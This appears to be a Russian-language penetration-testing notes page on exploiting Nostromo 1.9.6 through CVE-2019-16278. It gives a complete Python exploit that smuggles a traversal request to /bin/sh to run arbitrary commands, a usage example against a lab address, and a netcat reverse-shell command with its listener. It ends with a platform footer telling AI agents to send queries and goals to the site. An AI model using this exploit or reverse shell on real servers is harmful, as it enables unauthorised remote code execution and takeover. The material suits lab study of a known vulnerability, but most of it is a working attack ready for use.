> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/cms/nostromo-cms-exploitation.md).

# Nostromo

Заметки по эксплуатации Nostromo для удалённого выполнения команд CVE-2019-16278, доставки обратной оболочки и перечисления HomeDirs.

## Nostromo CVE-2019-16278 RCE

**Исследование эксплойта:** `searchsploit` определяет эксплойт RCE для Nostromo 1.9.6.

<figure><img src="/files/e2fcc48099acd8bc01142d4cfa7080e13156b046" alt="" width="563"><figcaption></figcaption></figure>

Скачайте proof of concept с GitHub.

{% embed url="<https://github.com/aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE>" %}

**Запуск скрипта:** Используйте следующий скрипт для выполнения команд на сервере:

```python
import argparse
import socket

# Конфигурация argparse
parser = argparse.ArgumentParser(description="Эксплойт для CVE-2019-16278 - Nostromo 1.9.6 RCE")
parser.add_argument("-t", "--target", help="Удалённый хост для атаки")
parser.add_argument("-p", "--port", help="Удалённый порт для атаки")
parser.add_argument("-c", "--command", help="Команда для выполнения на сервере")
parser.add_argument("-b", "--bytes", help="Количество байт, которые нужно получить в ответе")

# Определение и присвоение переменных
args = parser.parse_args()
TARGET = args.target
PORT = int(args.port)
COMMAND = args.command
BYTES = args.bytes

if BYTES is None:
    BYTES = 4096
else:
    BYTES = int(BYTES)

URL = "/.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0"

# Сборка и кодирование полезной нагрузки
payload = (f"POST {URL}/r/n"
           "Content-Length: 1/r/n/r/n"
           f"echo/necho/n{COMMAND} 2>&1").encode()

# Создание сокета и отправка полезной нагрузки
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, PORT))
s.send(payload)

# Получение ответа и закрытие сокета
print(s.recv(1024).decode())
print(s.recv(BYTES).decode())
s.close()
```

```bash
python exploit.py -t 10.10.10.165 -p 80 -c whoami
```

<figure><img src="/files/e2d697315e39f25683e573ebda9f424739444cde" alt="" width="563"><figcaption></figcaption></figure>

**Получение обратной оболочки:**

```bash
python exploit.py -t 10.10.10.165 -p 80 -c bash -c 'nc -e /bin/bash 10.10.14.10 443'
```

```bash
sudo nc -nlvp 443
```

<figure><img src="/files/57f01bc7cfab4698570a190389ef12d8e14e5c11" alt=""><figcaption></figcaption></figure>

## Связанная заметка

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-server" style="color:$primary;">:server:</i></h3></td><td><h4>Конфигурация HomeDirs</h4></td><td>Заметки по перечислению HomeDirs в Nostromo для проверки nhttpd.conf, обнаружения public_www, доступа к protected-file-area, извлечения резервного архива и восстановления SSH-ключа.</td><td><a href="/pages/e4dc8aa3e2fb3ec11fe48575e91da2ee8db4cb47">/pages/e4dc8aa3e2fb3ec11fe48575e91da2ee8db4cb47</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/cms/nostromo-cms-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
